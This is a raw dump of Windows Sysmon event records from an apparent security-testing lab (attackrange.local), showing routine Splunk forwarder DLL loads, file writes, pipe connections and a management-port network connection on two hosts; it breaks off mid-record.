23542300x80000000000000001605847Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.720{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C950D4180271E499240E1F19FEBE4905,SHA256=B24B1C9317F40AEC4F26705E20A75CC0C92959FE22D286224DA01BDDA9F4A09Ffalsefalse - insufficient disk space 534500x80000000000000001605846Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.557{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x80000000000000001605845Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.557{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x80000000000000001605844Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.557{21761711-7A4C-6080-BF60-00000000BB01}33166908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001605843Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.555{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605842Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.554{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0125A1BAECB6361AB2FE6B96319B57B6,SHA256=FC0AE474E32164326D9F23E9613D90CCB088BD4C50C66801152419771D0DC6B1falsefalse - insufficient disk space 734700x80000000000000001605841Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.552{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001605840Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.551{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001605839Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.435{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001605838Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 23542300x80000000000000001094922Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:32.653{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F986A3BDB5EF3F92F91B7F05E1BD31FD,SHA256=B77440A78582879D456E87CA5967F78B1EDE32184D1D053F7A59DC6ABB86C4DE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001094921Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:27.710{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1136-false10.0.1.12-8089- 10341000x80000000000000001094920Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:32.471{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094919Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:32.471{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094918Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:32.111{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1012CB55543E88411C93073901ED51B6,SHA256=8EE002B4164D01F836070E17B152E6546F12EF84F91758323380F1646FF4C681,IMPHASH=00000000000000000000000000000000falsetrue 734700x80000000000000001605837Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001605836Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x80000000000000001605835Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001605834Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x80000000000000001605833Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001605832Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001605831Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001605830Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001605829Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001605828Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001605827Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001605826Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001605825Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001605824Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001605823Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001605822Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001605821Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001605820Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001605819Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001605818Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001605817Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001605816Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001605815Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001605814Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001605813Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001605812Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001605811Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001605810Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001605809Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001605808Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001605807Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001605806Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001605805Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001605804Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001605803Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x80000000000000001605802Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 10341000x80000000000000001605801Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program 